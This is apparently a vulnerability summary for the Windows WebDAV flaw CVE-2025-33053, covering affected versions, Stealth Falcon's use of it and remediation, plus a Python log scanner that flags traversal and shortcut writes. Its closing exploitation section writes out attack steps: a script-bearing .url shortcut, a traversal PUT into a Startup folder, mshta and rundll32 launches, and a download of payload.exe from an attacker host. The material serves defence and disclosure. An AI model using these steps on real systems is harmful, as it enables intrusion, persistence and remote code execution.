Windows WebDAV: External control of file name/path in WebDAV leading to RCE (CVE-2025-33053) #shorts
Summary
On June 10, 2025, Microsoft patched CVE-2025-33053, a critical zero-day remote code execution vulnerability in its WebDAV implementation. Actively exploited by the Stealth Falcon APT in targeted cyber-espionage campaigns, the flaw allowed an attacker to execute arbitrary code over the network by abusing external control of file names or paths.
Product details
CVE-2025-33053 affects a broad range of Windows releases, including:
- Windows 10 Version 1809, 21H2, 22H2, 1507, 1607
- Windows 11 Versions 22H2, 22H3, 23H2, 24H2
- Windows Server 2008 SP2 (Full/Server Core), 2008 R2 SP1, 2012/2012 R2 (Full/Server Core), 2016/2019 (Full/Server Core), 2022 (Full/Server Core), 2025 (Server Core)
All installations prior to the patched build numbers are affected.
Vulnerability type summary
CWE-73: External Control of File Name or Path. The WebDAV service failed to validate or sanitize attacker-supplied file paths, enabling an unauthorized user to manipulate the file namespace and trigger remote code execution.
Details of the vulnerability
Stealth Falcon exploited this zero-day by delivering a malicious .url shortcut via spear-phishing to targets in the Middle East. The .url file leveraged a living-off-the-land binary (LOLBin) to invoke the WebDAV client with a crafted path. Because the service did not properly restrict folder or file input, the attacker could traverse directories, plant a payload, and execute arbitrary commands under SYSTEM privileges. Microsoft’s investigation confirmed the flaw was under active exploitation for espionage prior to the June Patch Tuesday release.
Conclusion
Organizations and users must install the June 2025 security updates immediately to remediate CVE-2025-33053. In environments where WebDAV is not required, consider disabling the protocol or applying network-level controls. Monitor logs for unexpected WebDAV requests and review filtering rules to block malicious .url invocation patterns.
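As an added example (not code from the original page, Microsoft, or any vendor tooling), the following Python script applies the monitoring advice above to WebDAV request logs: it flags write requests whose path traverses out of the share root, drops a shortcut file through WebDAV, or targets a Startup folder. The simplified log layout, the share root `/webdav/`, and the sample lines are constructed assumptions for this illustration.

```python
import posixpath
from urllib.parse import unquote

# Constructed sample lines in a simplified IIS W3C layout (date time method uri-stem status).
# They are made up for this example and are not captured traffic.
SAMPLE_LOG = """\
2025-06-11 09:14:02 PUT /webdav/reports/q2.docx 201
2025-06-11 09:14:10 PROPFIND /webdav/reports/ 207
2025-06-11 09:15:33 PUT /webdav/..\\..\\Windows\\Startup\\evil.url 201
2025-06-11 09:16:01 PUT /webdav/%2e%2e/%2e%2e/Users/Public/update.url 201
2025-06-11 09:17:45 GET /webdav/reports/q2.docx 200
"""

WRITE_METHODS = {"PUT", "MOVE", "COPY", "MKCOL"}   # methods that create or relocate resources
SHORTCUT_EXTS = (".url", ".lnk")                    # shortcut types Windows will execute on open

def normalize(uri: str) -> str:
    """Decode percent-encoding twice (catches double encoding) and unify backslashes to '/'."""
    return unquote(unquote(uri)).replace("\\", "/")

def resolves_outside(uri: str, root: str = "/webdav/") -> bool:
    """True when the request path, after collapsing '..' segments, leaves the WebDAV root."""
    resolved = posixpath.normpath(normalize(uri))
    return not (resolved + "/").startswith(root)

def analyse_line(line: str, root: str = "/webdav/") -> list[str]:
    """Return the reasons one log line looks like CWE-73 abuse (empty list = nothing flagged)."""
    fields = line.split()
    if len(fields) < 5:
        return []
    method, uri = fields[2], fields[3]
    path = normalize(uri)
    reasons = []
    if ".." in path.split("/"):
        reasons.append("dot-dot traversal segment in request path")
    if method in WRITE_METHODS and resolves_outside(uri, root):
        reasons.append(f"{method} resolves outside {root}")
    if method in WRITE_METHODS and path.lower().endswith(SHORTCUT_EXTS):
        reasons.append("shortcut file written through WebDAV")
    if "/startup/" in path.lower():
        reasons.append("path targets a Startup folder (logon persistence)")
    return reasons

def scan(log_text: str, root: str = "/webdav/") -> list[tuple[str, list[str]]]:
    """Keep only the log lines that analyse_line flags, paired with their reasons."""
    flagged = ((line, analyse_line(line, root)) for line in log_text.splitlines())
    return [(line, reasons) for line, reasons in flagged if reasons]
```

Running `scan(SAMPLE_LOG)` flags only the two traversal PUTs; the normal PUT, PROPFIND and GET lines pass untouched.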
Watch the full video on YouTube: CVE-2025-33053
Remediation and exploitation details
This chain involves the following actors:
- Stealth Falcon APT group: attacker
- IT administrator: defender
The following systems are involved:
- Windows WebDAV service (file management over HTTP): vulnerable component
- Windows 10, Windows 11, Windows Server (operating system hosting WebDAV): affected platform
Attack entry point
- WebDAV file name and path parameter: file path supplied via HTTP PUT in WebDAV
- Malicious .url shortcut file: Internet Shortcut containing script code invoked by Windows
Remediation actions
Exploitation actions
external control of file name/path via crafted file content
- [InternetShortcut]\r\nURL=javascript:new ActiveXObject('WScript.Shell').Run('cmd.exe /c powershell -e ...')
use of ../ sequences to escape root and write to Windows Startup
- PUT /webdav/..\\..\\Windows\\Startup\\evil.url HTTP/1.1
- Host: target.example.com
living-off-the-land binary execution
- mshta.exe C:\Windows\Startup\evil.url
- rundll32.exe url.dll,FileProtocolHandler C:\Windows\Startup\evil.url
remote code execution via externally controlled file
- JavaScript downloads an executable from http://attacker/payload.exe and runs it
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33053
- [2025-06-11] A critical zero-day vulnerability in Microsoft Windows, designated CVE-2025-33053, has been actively exploited by the APT group Stealth Falcon.
- [2025-06-11] Microsoft fixes zero-day vulnerability exploited for cyber espionage in June 2025 Patch Tuesday.
- [2025-06-10] Stealth Falcon APT group uses a .url file with LOLBin to execute malware in the Middle East.
- [2025-06-10] Microsoft's June 2025 Patch Tuesday release addresses 65 CVEs, including two zero-day vulnerabilities.
- [2025-06-11] Microsoft has fixed the CVE-2025-33053 vulnerability in WebDAV that allowed remote code execution.
- [2025-06-11] A new critical zero-day RCE vulnerability in Microsoft Windows, tracked as CVE-2025-33053, is being exploited by the Stealth Falcon APT group.